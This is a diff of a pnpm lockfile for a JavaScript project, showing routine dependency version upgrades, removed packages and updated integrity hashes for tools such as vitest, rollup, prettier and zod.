-    resolution: {integrity: sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==}
-    engines: {node: '>=12'}
-
-  picomatch@4.0.3:
-    resolution: {integrity: sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==}
+  picomatch@4.0.5:
+    resolution: {integrity: sha512-RvwwcruNjI1ncT5xRakeyS9Lf8lcItv34KD+aif+VH9kduAyfYBipGh12274xtenIPZ119/R9BdTBa8gAwSh0A==}
     engines: {node: '>=12'}
 
   pify@4.0.1:
     resolution: {integrity: sha512-uB80kBFb/tfd68bVleG9T5GGsGPjJrLAUpR5PZIrhBnIaRTQRjqdJSsIKkOP6OAIFbj7GOrcudc5pNjZ+geV2g==}
     engines: {node: '>=6'}
 
-  pkg-pr-new@0.0.59:
-    resolution: {integrity: sha512-dnSddkZUs5Qz6JhMmHTyYZuscwYRw8XbANazk0uObR89XS2N0AC0gtKMqWxYhgG14BT29kUHGy8aAOYFL1wfeg==}
+  pkg-pr-new@0.0.79:
+    resolution: {integrity: sha512-ip74NzaakGZha5s/X1T7j+Ez9/bRNDhzxQZTfnzAzoI7zO9JnMRdoiIfCLyy+ZzxxXg8WXRW2WcdvdORI0O30w==}
     hasBin: true
 
   pkg-types@1.3.1:
@@ -2756,20 +2425,16 @@ packages:
   postcss-value-parser@4.2.0:
     resolution: {integrity: sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==}
 
-  postcss@8.5.1:
-    resolution: {integrity: sha512-6oz2beyjc5VMn/KV1pPw8fliQkhBXrVn1Z3TVyqZxU8kZpzEKhBdmCFqI6ZbmGtamQvQGuU1sgPTk8ZrXDD7jQ==}
-    engines: {node: ^10 || ^12 || >=14}
-
-  postcss@8.5.6:
-    resolution: {integrity: sha512-3Ybi1tAuwAP9s0r1UQ2J4n5Y0G05bJkpUIO0/bI9MhwmD70S5aTWbXGBwxHrelT+XM1k6dM0pk+SwNkpTRN7Pg==}
+  postcss@8.5.21:
+    resolution: {integrity: sha512-v4sDNP3fdNiWMfabO7OwOQdOX8TiQSztKyT1Wj0w+j7LDallJThJRBBBmzVGyYj0crMh7jlV4zepPkiNu9UwDQ==}
     engines: {node: ^10 || ^12 || >=14}
 
   prelude-ls@1.2.1:
     resolution: {integrity: sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==}
     engines: {node: '>= 0.8.0'}
 
-  prettier-linter-helpers@1.0.0:
-    resolution: {integrity: sha512-GbK2cP9nraSSUF9N2XwUwqfzlAFlMNYYl+ShE/V+H8a9uNl/oUqB1w2EL54Jh0OlyRSd8RfWYJ3coVS4TROP2w==}
+  prettier-linter-helpers@1.0.1:
+    resolution: {integrity: sha512-SxToR7P8Y2lWmv/kTzVLC1t/GDI2WGjMwNhLLE9qtH8Q13C+aEmuRlzDst4Up4s0Wc8sF2M+J57iB3cMLqftfg==}
     engines: {node: '>=6.0.0'}
 
   prettier@2.8.8:
@@ -2777,8 +2442,8 @@ packages:
     engines: {node: '>=10.13.0'}
     hasBin: true
 
-  prettier@3.6.2:
-    resolution: {integrity: sha512-I7AIg5boAr5R0FFtJ6rCfD+LFsWHp81dolrFD8S79U9tb8Az2nGrJncnMSnys+bpQJfRUzqs9hnA81OAA3hCuQ==}
+  prettier@3.9.6:
+    resolution: {integrity: sha512-OpN0zzVdiaiAhxpuuj5efpIS4sY9j7bY6uR5mnj5yPzGkdkjNKSJeUThPb60Jw29QuAZgA4o+/iB49kFiaBX6g==}
     engines: {node: '>=14'}
     hasBin: true
 
@@ -2805,23 +2470,11 @@ packages:
   quansync@0.2.10:
     resolution: {integrity: sha512-t41VRkMYbkHyCYmOvx/6URnN80H7k4X0lLdBMGsz+maAwrJQYB1djpV6vHrQIBE0WBSGqhtEHrK9U3DWWH8v7A==}
 
-  query-registry@3.0.1:
-    resolution: {integrity: sha512-M9RxRITi2mHMVPU5zysNjctUT8bAPx6ltEXo/ir9+qmiM47Y7f0Ir3+OxUO5OjYAWdicBQRew7RtHtqUXydqlg==}
-    engines: {node: '>=20'}
-
-  query-string@9.3.1:
-    resolution: {integrity: sha512-5fBfMOcDi5SA9qj5jZhWAcTtDfKF5WFdd2uD9nVNlbxVv1baq65aALy6qofpNEGELHvisjjasxQp7BlM9gvMzw==}
-    engines: {node: '>=18'}
-
   queue-microtask@1.2.3:
     resolution: {integrity: sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==}
 
-  quick-lru@7.3.0:
-    resolution: {integrity: sha512-k9lSsjl36EJdK7I06v7APZCbyGT2vMTsYSRX1Q2nbYmnkBqgUhRkAuzH08Ciotteu/PLJmIF2+tti7o3C/ts2g==}
-    engines: {node: '>=18'}
-
-  rc9@2.1.2:
-    resolution: {integrity: sha512-btXCnMmRIBINM2LDZoEmOogIZU7Qe7zn4BpomSKZ/ykbLObuBdvG+mFq11DL6fjH1DRwHhrlgtYWG96bJiC7Cg==}
+  rc9@3.0.1:
+    resolution: {integrity: sha512-gMDyleLWVE+i6Sgtc0QbbY6pEKqYs97NGi6isHQPqYlLemPoO8dxQ3uGi0f4NiP98c+jMW6cG1Kx9dDwfvqARQ==}
 
   rc@1.2.8:
     resolution: {integrity: sha512-y3bGgqKj3QBdxLbLkomlohkvsA8gdAiUQlSBJnBhfn+BPxg4bc62d8TcBW15wavDfgexCgccckhcZvywyQYPOw==}
@@ -2831,9 +2484,9 @@ packages:
     resolution: {integrity: sha512-VIMnQi/Z4HT2Fxuwg5KrY174U1VdUIASQVWXXyqtNRtxSr9IYkn1rsI6Tb6HsrHCmB7gVpNwX6JxPTHcH6IoTA==}
     engines: {node: '>=6'}
 
-  readdirp@4.1.1:
-    resolution: {integrity: sha512-h80JrZu/MHUZCyHu5ciuoI0+WxsCxzxJTILn6Fs8rxSnFPh+UVHYfeIxK1nVGugMqkfC4vJcBOYbkfkwYK0+gw==}
-    engines: {node: '>= 14.18.0'}
+  readdirp@5.0.0:
+    resolution: {integrity: sha512-9u/XQ1pvrQtYyMpZe7DXKv2p5CNvyVwzUB6uhLAnQwHMSgKMBR62lc7AHljaeteeHXn11XTAaLLUVZYVZyuRBQ==}
+    engines: {node: '>= 20.19.0'}
 
   regenerator-runtime@0.14.1:
     resolution: {integrity: sha512-dYnhHh0nJoMfnkZs6GmmhFknAGRrLznOu5nc9ML+EJxGvrx6H7teuevqVqCuPcPK//3eDrrjQhehXVx9cnkGdw==}
@@ -2878,13 +2531,8 @@ packages:
       rollup: ^3.29.4 || ^4
       typescript: ^4.5 || ^5.0
 
-  rollup@4.34.6:
-    resolution: {integrity: sha512-wc2cBWqJgkU3Iz5oztRkQbfVkbxoz5EhnCGOrnJvnLnQ7O0WhQUYyv18qQI79O8L7DdHrrlJNeCHd4VGpnaXKQ==}
-    engines: {node: '>=18.0.0', npm: '>=8.0.0'}
-    hasBin: true
-
-  rollup@4.52.5:
-    resolution: {integrity: sha512-3GuObel8h7Kqdjt0gxkEzaifHTqLVW56Y/bjN7PSQtkKr0w3V/QYSdt6QWYtd7A1xUtYQigtdUfgj1RvWVtorw==}
+  rollup@4.62.2:
+    resolution: {integrity: sha512-RFnrW4lhXA3s3eqHDZvN654g8OTjzRfqpIRJYczCGB6HzphckVAi/Qh4tbPUbRuDi7s1Llv8g/NspLkttY3gTA==}
     engines: {node: '>=18.0.0', npm: '>=8.0.0'}
     hasBin: true
 
@@ -2898,14 +2546,15 @@ packages:
   safer-buffer@2.1.2:
     resolution: {integrity: sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==}
 
-  sax@1.4.1:
-    resolution: {integrity: sha512-+aWOz7yVScEGoKNd4PA10LZ8sk0A/z5+nXQG5giUO5rprX9jgYsTdov9qCchZiPIZezbZH+jRut8nPodFAX4Jg==}
+  sax@1.6.0:
+    resolution: {integrity: sha512-6R3J5M4AcbtLUdZmRv2SygeVaM7IhrLXu9BmnOGmmACak8fiUtOsYNWUS4uK7upbmHIBbLBeFeI//477BKLBzA==}
+    engines: {node: '>=11.0.0'}
 
   scule@1.3.0:
     resolution: {integrity: sha512-6FtHJEvt+pVMIB9IBY+IcCJ6Z5f1iQnytgyfKMhDKgmzYG+TeH/wx1y3l27rshSbLiSanrR9ffZDrEsmjlQF2g==}
 
-  semver@7.7.2:
-    resolution: {integrity: sha512-RF0Fw+rO5AMf9MAyaRXI4AV0Ulj5lMHqVxxdSgiVbixSCXoEmmX/jk0CuJw4+3SqroYO9VoUh+HcuJivvtJemA==}
+  semver@7.8.5:
+    resolution: {integrity: sha512-Y7/KDsb8LjooZpwaqGyulO6DQlksgCncchHGk+sZIY4SBvUocMBEFH5Ur1fI4dV+Jvl0w6cjvucaIi40puRioA==}
     engines: {node: '>=10'}
     hasBin: true
 
@@ -2938,22 +2587,14 @@ packages:
   spawndamnit@3.0.1:
     resolution: {integrity: sha512-MmnduQUuHCoFckZoWnXsTg7JaiLBJrKFj9UI2MbRPGaJeVpsLcVBu6P/IGZovziM/YBsellCmsprgNA+w0CzVg==}
 
-  split-on-first@3.0.0:
-    resolution: {integrity: sha512-qxQJTx2ryR0Dw0ITYyekNQWpz6f8dGd7vffGNflQQ3Iqj9NJ6qiZ7ELpZsJ/QBhIVAiDfXdag3+Gp8RvWa62AA==}
-    engines: {node: '>=12'}
-
   sprintf-js@1.0.3:
     resolution: {integrity: sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==}
 
   stackback@0.0.2:
     resolution: {integrity: sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==}
 
-  std-env@3.10.0:
-    resolution: {integrity: sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==}
-
-  string-argv@0.3.2:
-    resolution: {integrity: sha512-aqD2Q0144Z+/RqG52NeHEkZauTAUWJO8c6yTftGJKO3Tja5tUgIfmIl6kExvhtxSDP7fXB6DvzkfMpCd/F3G+Q==}
-    engines: {node: '>=0.6.19'}
+  std-env@4.2.0:
+    resolution: {integrity: sha512-oCUKSupKTHX53EyjDtuZQ64pjLJ6yYCtpmEw0goYxtjG9KpbRe8KAsl2tBUGU9DyMcJ0RwJ8GqJAFzMXcXW1Rw==}
 
   string-width@4.2.3:
     resolution: {integrity: sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==}
@@ -2991,9 +2632,6 @@ packages:
     resolution: {integrity: sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==}
     engines: {node: '>=8'}
 
-  strip-literal@3.1.0:
-    resolution: {integrity: sha512-8r3mkIM/2+PpjHoOtiAW8Rg3jJLHaV7xPwG+YRGrv6FP0wwk/toTpATxWYOW0BKdWwl82VT2tFYi5DlROa0Mxg==}
-
   stubborn-fs@1.2.5:
     resolution: {integrity: sha512-H2N9c26eXjzL/S/K+i/RHHcFanE74dptvvjM8iwzwbVcWY/zjBbgRqF3K0DY4+OD+uTTASTBvDoxPDaPN02D7g==}
 
@@ -3011,22 +2649,18 @@ packages:
     resolution: {integrity: sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==}
     engines: {node: '>= 0.4'}
 
-  svgo@4.0.0:
-    resolution: {integrity: sha512-VvrHQ+9uniE+Mvx3+C9IEe/lWasXCU0nXMY2kZeLrHNICuRiC8uMPyM14UEaMOFA5mhyQqEkB02VoQ16n3DLaw==}
+  svgo@4.0.2:
+    resolution: {integrity: sha512-ekx94z1rRc5LDi6oSUaeRnYhd0UOJxdtQCL2rF8xpWxD3TPAsISWOrxezqGovqS38GRZOdpDfvQe3ts6F7nsng==}
     engines: {node: '>=16'}
     hasBin: true
 
-  synckit@0.11.11:
-    resolution: {integrity: sha512-MeQTA1r0litLUf0Rp/iisCaL8761lKAZHaimlbGK4j0HysC4PLfqygQj9srcs0m2RdtDYnF8UuYyKpbjHYp7Jw==}
+  synckit@0.11.13:
+    resolution: {integrity: sha512-eNRKgb3z66Yp3D2CixVujOUvXLFUTij/zVnV8KRyvFdQwpz7I5DS8UfRkTeLzb64u+dkzDSdelE24izu+zSSUg==}
     engines: {node: ^14.18.0 || >=16.0.0}
 
   term-size@2.2.1:
     resolution: {integrity: sha512-wK0Ri4fOGjv/XPy8SBHZChl8CM7uMc5VML7SqiQ0zG7+J5Vr+RMQDoHa2CNT6KHUnTGIXH34UDMkPzAUyapBZg==}
     engines: {node: '>=8'}
-
-  test-exclude@7.0.1:
-    resolution: {integrity: sha512-pFYqmTw68LXVjeWJMST4+borgQP2AyMNbg1BpZh9LbyhUeNkeaPF9gzfPGUAnSMV3qPYdWUwDIjjCLiSDOl7vg==}
-    engines: {node: '>=18'}
 
   thingies@2.5.0:
     resolution: {integrity: sha512-s+2Bwztg6PhWUD7XMfeYm5qliDdSiZm7M7n8KjTkIsm3l/2lgVRc2/Gx/v+ZX8lT4FMA+i8aQvhcWylldc+ZNw==}
@@ -3037,30 +2671,19 @@ packages:
   tinybench@2.9.0:
     resolution: {integrity: sha512-0+DUvqWMValLmha6lr4kD8iAMK1HzV0/aKnCtWb9v9641TnP/MFb7Pc2bxoxQjTXAErryXVgUOfv2YqNllqGeg==}
 
-  tinyexec@0.3.2:
-    resolution: {integrity: sha512-KQQR9yN7R5+OSwaK0XQoj22pwHoTlgYqmUscPYoknOoWCWfj/5/ABTMRi69FrKU5ffPVh5QcFikpWJI/P1ocHA==}
-
   tinyexec@1.0.1:
     resolution: {integrity: sha512-5uC6DDlmeqiOwCPmK9jMSdOuZTh8bU39Ys6yidB+UTt5hfZUPGAypSgFRiEp+jbi9qH40BLDvy85jIU88wKSqw==}
 
-  tinyglobby@0.2.10:
-    resolution: {integrity: sha512-Zc+8eJlFMvgatPZTl6A9L/yht8QqdmUNtURHaKZLmKBE12hNPSrqNkUp2cs3M/UKmNVVAMFQYSjYIVHDjW5zew==}
-    engines: {node: '>=12.0.0'}
+  tinyexec@1.2.4:
+    resolution: {integrity: sha512-SHf/r48b7vOrjve9PxJo3MN5v5yuyjHvdUcrQffT3WXMUfnGmHDVbC4k3sHJaJTgZCwpUplIaAo5ANtMyp3YHg==}
+    engines: {node: '>=18'}
 
   tinyglobby@0.2.15:
     resolution: {integrity: sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ==}
     engines: {node: '>=12.0.0'}
 
-  tinypool@1.1.1:
-    resolution: {integrity: sha512-Zba82s87IFq9A9XmjiX5uZA/ARWDrB03OHlq+Vw1fSdt0I+4/Kutwy8BP4Y/y/aORMo61FQ0vIb5j44vSo5Pkg==}
-    engines: {node: ^18.0.0 || >=20.0.0}
-
-  tinyrainbow@2.0.0:
-    resolution: {integrity: sha512-op4nsTR47R6p0vMUUoYl/a+ljLFVtlfaXkLQmqfLR1qHma1h/ysYk4hEXZ880bf2CYgTskvTa/e196Vd5dDQXw==}
-    engines: {node: '>=14.0.0'}
-
-  tinyspy@4.0.4:
-    resolution: {integrity: sha512-azl+t0z7pw/z958Gy9svOTuzqIk6xq+NSheJzn5MMWtWTFywIacg2wUlzKFGtt3cthx0r2SxMK0yzJOR0IES7Q==}
+  tinyrainbow@3.1.0:
+    resolution: {integrity: sha512-Bf+ILmBgretUrdJxzXM0SgXLZ3XfiaUuOj/IKQHuTXip+05Xn+uyEYdVg0kYDipTBcLrCVyUzAPz7QmArb0mmw==}
     engines: {node: '>=14.0.0'}
 
   to-regex-range@5.0.1:
@@ -3070,26 +2693,14 @@ packages:
   tr46@0.0.3:
     resolution: {integrity: sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==}
 
-  tree-dump@1.0.3:
-    resolution: {integrity: sha512-il+Cv80yVHFBwokQSfd4bldvr1Md951DpgAGfmhydt04L+YzHgubm2tQ7zueWDcGENKHq0ZvGFR/hjvNXilHEg==}
-    engines: {node: '>=10.0'}
-    peerDependencies:
-      tslib: '2'
-
   tree-dump@1.1.0:
     resolution: {integrity: sha512-rMuvhU4MCDbcbnleZTFezWsaZXRFemSqAM+7jPnzUl1fo9w3YEKOxAeui0fz3OI4EU4hf23iyA7uQRVko+UaBA==}
     engines: {node: '>=10.0'}
     peerDependencies:
       tslib: '2'
 
-  ts-api-utils@2.0.1:
-    resolution: {integrity: sha512-dnlgjFSVetynI8nzgJ+qF62efpglpWRk8isUEWZGWlJYySCTD6aKvbUDu+zbPeDakk3bg5H4XpitHukgfL1m9w==}
-    engines: {node: '>=18.12'}
-    peerDependencies:
-      typescript: '>=4.8.4'
-
-  ts-api-utils@2.1.0:
-    resolution: {integrity: sha512-CUgTZL1irw8u29bzrOD/nH85jqyc74D6SshFgujOIA7osm2Rz7dYH77agkx7H4FBNxDq7Cjf+IjaX/8zwFW+ZQ==}
+  ts-api-utils@2.5.0:
+    resolution: {integrity: sha512-OJ/ibxhPlqrMM0UiNHJ/0CKQkoKF243/AEmplt3qpRgkW8VG7IfOS41h7V8TjITqdByHzrjcS/2si+y4lIh8NA==}
     engines: {node: '>=18.12'}
     peerDependencies:
       typescript: '>=4.8.4'
@@ -3097,17 +2708,9 @@ packages:
   tslib@2.8.1:
     resolution: {integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==}
 
-  tunnel@0.0.6:
-    resolution: {integrity: sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==}
-    engines: {node: '>=0.6.11 <=0.7.0 || >=0.7.3'}
-
   type-check@0.4.0:
     resolution: {integrity: sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==}
     engines: {node: '>= 0.8.0'}
-
-  type-detect@4.1.0:
-    resolution: {integrity: sha512-Acylog8/luQ8L7il+geoSxhEkazvkslg7PSNKOX59mbB9cOveP5aq9h74Y7YU8yDpJwetzQQrfIwtf4Wp4LKcw==}
-    engines: {node: '>=4'}
 
   type-fest@2.19.0:
     resolution: {integrity: sha512-RAH822pAdBgcNMAfWnCBU3CFZcfZ/i1eZjwFU/dsLKumyuuP3niueg2UAukXYF0E2AAoc82ZSSf9J0WQBinzHA==}
@@ -3117,12 +2720,12 @@ packages:
     resolution: {integrity: sha512-TeTSQ6H5YHvpqVwBRcnLDCBnDOHWYu7IvGbHT6N8AOymcr9PJGjc1GTtiWZTYg0NCgYwvnYWEkVChQAr9bjfwA==}
     engines: {node: '>=16'}
 
-  typescript-eslint@8.46.2:
-    resolution: {integrity: sha512-vbw8bOmiuYNdzzV3lsiWv6sRwjyuKJMQqWulBOU7M0RrxedXledX8G8kBbQeiOYDnTfiXz0Y4081E1QMNB6iQg==}
+  typescript-eslint@8.65.0:
+    resolution: {integrity: sha512-/ggrHAwyjENDusvyxbuqxAC2dTnZg/Z8F+fgQtYIz+L6n/9HfSlEZcFGV/NsMNa6CkGk0xUjUAFwC0vHOflvIA==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     peerDependencies:
-      eslint: ^8.57.0 || ^9.0.0
-      typescript: '>=4.8.4 <6.0.0'
+      eslint: ^8.57.0 || ^9.0.0 || ^10.0.0
+      typescript: '>=4.8.4 <6.1.0'
 
   typescript@5.9.3:
     resolution: {integrity: sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw==}
@@ -3147,19 +2750,8 @@ packages:
   undici-types@7.16.0:
     resolution: {integrity: sha512-Zz+aZWSj8LE6zoxD+xrjh4VfkIG8Ya6LvYkZqtUQGJPZjYl53ypCaUwWqo7eI0x66KBGeRo+mlBEkMSeSZ38Nw==}
 
-  undici@5.29.0:
-    resolution: {integrity: sha512-raqeBD6NQK4SkWhQzeYKd1KmIG6dllBOTt55Rmkt4HtI9mwdWtJljnrXjAFUBLTSN67HWrOIZ3EPF4kjUw80Bg==}
-    engines: {node: '>=14.0'}
-
-  undici@6.22.0:
-    resolution: {integrity: sha512-hU/10obOIu62MGYjdskASR3CUAiYaFTtC9Pa6vHyf//mAipSvSQg6od2CnJswq7fvzNS3zJhxoRkgNVaHurWKw==}
-    engines: {node: '>=18.17'}
-
   unist-util-stringify-position@2.0.3:
     resolution: {integrity: sha512-3faScn5I+hy9VleOq/qNbAd6pAx7iH5jYBMS9I1HgQVijz/4mv5Bvw5iw1sC/90CODiKo81G/ps8AJrISn687g==}
-
-  universal-user-agent@6.0.1:
-    resolution: {integrity: sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==}
 
   universalify@0.1.2:
     resolution: {integrity: sha512-rBJeI5CXAlmy1pV+617WB9J63U6XcazHHF2f2dbJix4XzpUF0RS3Zbj0FGIOCAva5P/d/GBOYaACQ1w+0azUkg==}
@@ -3188,24 +2780,11 @@ packages:
   uri-js@4.4.1:
     resolution: {integrity: sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==}
 
-  url-join@5.0.0:
-    resolution: {integrity: sha512-n2huDr9h9yzd6exQVnH/jU5mr+Pfx08LRXXZhkLLetAMESRj+anQsTAh940iMrIetKAmry9coFuZQ2jY8/p3WA==}
-    engines: {node: ^12.20.0 || ^14.13.1 || >=16.0.0}
-
   util-deprecate@1.0.2:
     resolution: {integrity: sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==}
 
-  validate-npm-package-name@5.0.1:
-    resolution: {integrity: sha512-OljLrQ9SQdOUqTaQxqL5dEfZWrXExyyWsozYlAWFawPVNuD83igl7uJD2RTkNMbniIYgt8l81eCJGIdQF7avLQ==}
-    engines: {node: ^14.17.0 || ^16.13.0 || >=18.0.0}
-
-  vite-node@3.2.4:
-    resolution: {integrity: sha512-EbKSKh+bh1E1IFxeO0pg1n4dvoOTt0UDiXMd/qn++r98+jPO1xtJilvXldeuQ8giIB5IkpjCgMleHMNEsGH6pg==}
-    engines: {node: ^18.0.0 || ^20.0.0 || >=22.0.0}
-    hasBin: true
-
-  vite@6.1.0:
-    resolution: {integrity: sha512-RjjMipCKVoR4hVfPY6GQTgveinjNuyLw+qruksLDvA5ktI1150VmcMBKmQaEWJhg/j6Uaf6dNCNA0AfdzUb/hQ==}
+  vite@6.4.3:
+    resolution: {integrity: sha512-NTKlcQjlAK7MlQoyb6LgaqHc8sso/pVyUJYWMws3jg21uTJw/LddqIFPcPqP6PzpgbIcZyKI85sFE4HBrQDA8A==}
     engines: {node: ^18.0.0 || ^20.0.0 || >=22.0.0}
     hasBin: true
     peerDependencies:
@@ -3244,26 +2823,39 @@ packages:
       yaml:
         optional: true
 
-  vitest@3.2.4:
-    resolution: {integrity: sha512-LUCP5ev3GURDysTWiP47wRRUpLKMOfPh+yKTx3kVIEiu5KOMeqzpnYNsKyOoVrULivR8tLcks4+lga33Whn90A==}
-    engines: {node: ^18.0.0 || ^20.0.0 || >=22.0.0}
+  vitest@4.1.10:
+    resolution: {integrity: sha512-R9jUTe5S4Qb0HCd4TNqpC7oGcrMssMRGXLW80ubjWsW9VH5GF8y1Y0SFLY9AbqSk6nt0PnOx4H4WNJYZ13GUPw==}
+    engines: {node: ^20.0.0 || ^22.0.0 || >=24.0.0}
     hasBin: true
     peerDependencies:
       '@edge-runtime/vm': '*'
-      '@types/debug': ^4.1.12
-      '@types/node': ^18.0.0 || ^20.0.0 || >=22.0.0
-      '@vitest/browser': 3.2.4
-      '@vitest/ui': 3.2.4
+      '@opentelemetry/api': ^1.9.0
+      '@types/node': ^20.0.0 || ^22.0.0 || >=24.0.0
+      '@vitest/browser-playwright': 4.1.10
+      '@vitest/browser-preview': 4.1.10
+      '@vitest/browser-webdriverio': 4.1.10
+      '@vitest/coverage-istanbul': 4.1.10
+      '@vitest/coverage-v8': 4.1.10
+      '@vitest/ui': 4.1.10
       happy-dom: '*'
       jsdom: '*'
+      vite: ^6.0.0 || ^7.0.0 || ^8.0.0
     peerDependenciesMeta:
       '@edge-runtime/vm':
         optional: true
-      '@types/debug':
+      '@opentelemetry/api':
         optional: true
       '@types/node':
         optional: true
-      '@vitest/browser':
+      '@vitest/browser-playwright':
+        optional: true
+      '@vitest/browser-preview':
+        optional: true
+      '@vitest/browser-webdriverio':
+        optional: true
+      '@vitest/coverage-istanbul':
+        optional: true
+      '@vitest/coverage-v8':
         optional: true
       '@vitest/ui':
         optional: true
@@ -3303,10 +2895,6 @@ packages:
     resolution: {integrity: sha512-BN22B5eaMMI9UMtjrGd5g5eCYPpCPDUy0FJXbYsaT5zYxjFOckS53SQDE3pWkVoWpHXVb3BrYcEN4Twa55B5cA==}
     engines: {node: '>=0.10.0'}
 
-  wrap-ansi@7.0.0:
-    resolution: {integrity: sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==}
-    engines: {node: '>=10'}
-
   wrap-ansi@8.1.0:
     resolution: {integrity: sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==}
     engines: {node: '>=12'}
@@ -3314,9 +2902,6 @@ packages:
   wrap-ansi@9.0.0:
     resolution: {integrity: sha512-G8ura3S+3Z2G+mkgNRq8dqaFZAuxfsxpBB8OCTGRTCtp+l/v9nbFNmCUP1BZMts3G1142MsZfn6eeUKrr4PD1Q==}
     engines: {node: '>=18'}
-
-  wrappy@1.0.2:
-    resolution: {integrity: sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==}
 
   xdg-basedir@5.1.0:
     resolution: {integrity: sha512-GCPAHLvrIH13+c0SuacwvRYj2SxJXQ4kaVTT5xgL3kPrz56XxkF21IGhjSE1+W0aw7gpBWRGXLCPnPby6lSpmQ==}
@@ -3326,41 +2911,10 @@ packages:
     resolution: {integrity: sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==}
     engines: {node: '>=10'}
 
-  zod-package-json@1.2.0:
-    resolution: {integrity: sha512-tamtgPM3MkP+obfO2dLr/G+nYoYkpJKmuHdYEy6IXRKfLybruoJ5NUj0lM0LxwOpC9PpoGLbll1ecoeyj43Wsg==}
-    engines: {node: '>=20'}
-
-  zod@3.24.1:
-    resolution: {integrity: sha512-muH7gBL9sI1nciMZV67X5fTKKBLtwpZ5VBp1vsOQzj1MhrBZ4wlVCm3gedKZWLp0Oyel8sIGfeiz54Su+OVT+A==}
-
-  zod@3.25.76:
-    resolution: {integrity: sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==}
-
-  zod@4.1.5:
-    resolution: {integrity: sha512-rcUUZqlLJgBC33IT3PNMgsCq6TzLQEG/Ei/KTCU0PedSWRMAXoOUN+4t/0H+Q8bdnLPdqUYnvboJT0bn/229qg==}
+  zod@4.4.3:
+    resolution: {integrity: sha512-ytENFjIJFl2UwYglde2jchW2Hwm4GJFLDiSXWdTrJQBIN9Fcyp7n4DhxJEiWNAJMV1/BqWfW/kkg71UDcHJyTQ==}
 
 snapshots:
-
-  '@actions/core@1.11.1':
-    dependencies:
-      '@actions/exec': 1.1.1
-      '@actions/http-client': 2.2.3
-
-  '@actions/exec@1.1.1':
-    dependencies:
-      '@actions/io': 1.1.3
-
-  '@actions/http-client@2.2.3':
-    dependencies:
-      tunnel: 0.0.6
-      undici: 5.29.0
-
-  '@actions/io@1.1.3': {}
-
-  '@ampproject/remapping@2.3.0':
-    dependencies:
-      '@jridgewell/gen-mapping': 0.3.8
-      '@jridgewell/trace-mapping': 0.3.25
 
   '@babel/code-frame@7.27.1':
     dependencies:
